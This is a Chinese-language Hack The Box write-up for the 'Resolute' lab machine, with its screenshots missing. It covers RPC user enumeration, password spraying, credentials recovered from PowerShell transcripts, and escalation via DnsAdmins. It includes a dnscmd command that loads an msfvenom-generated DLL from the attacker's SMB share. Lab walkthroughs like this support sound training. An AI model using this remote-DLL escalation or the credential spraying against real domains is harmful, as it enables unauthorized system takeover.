HTB-Resolute

在这里插入图片描述

信息收集

在这里插入图片描述
SMB 445

在这里插入图片描述
netbios-ssn 139
使用空用户连接目标rpc,并从域中枚举用户。
在这里插入图片描述
开始收集信息。
在这里插入图片描述
有一个密码Welcome123!,还有一堆用户名。
在这里插入图片描述

接下来就是暴力跑一遍。将之前nmap扫描出来的389的域名拿来用。

在这里插入图片描述

在这里插入图片描述

立足

通过winrm知道了megabank.local\melanie:Welcome123!是可行的。
在这里插入图片描述

melanie -> ryan

在C盘根目录收集信息的时候发现了几个隐藏文件夹以及文件。
在这里插入图片描述
根目录下的PSTranscripts里面有些有趣的东西。
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

其中有一行。
在这里插入图片描述
使用ryan:Serv3r4Admin4cc123!通过evil-winrm登录。
在这里插入图片描述

提权

在ryan的桌面有一个note.txt文件。内容如下:
在这里插入图片描述我们需要在1分钟之内完成操作,否则1分钟过后会被重置。想查看时间任务看看能否被用来执行脚本。
在这里插入图片描述
可惜不行,继续收集ryan的更多信息,在搜索到ryan的组的时候发现了一个有趣的分组DnsAdmins。

在这里插入图片描述
我们可以通过让DNS服务器加载远程dll并执行。我们用msfvenom生成一个恶意dll。

本地运行smb服务,smbserver.py出现了一些问题。
在这里插入图片描述
在impacket网站重新git一遍,然后sudo python3 setup.py install。
在这里插入图片描述
就好了。
在这里插入图片描述

使用格式是smbserver.py 共享名字 共享路径,以当前环境为路径,共享名字为rick。
在这里插入图片描述

使用命令获取:dnscmd /config /serverlevelplugindll \\10.10.14.31\rick\adduser.dll

在这里插入图片描述

下一步是让DNS服务重启,没有任何反应,是不是msfvenom生成的dll出现了问题。
在这里插入图片描述
还是说超过1分钟了?提前输入好命令,快速完成。(如果在生产环境中,重启DNS可能会造成糟糕的事情,要特别小心。)
在这里插入图片描述


版权声明:本文为qq_37370714原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。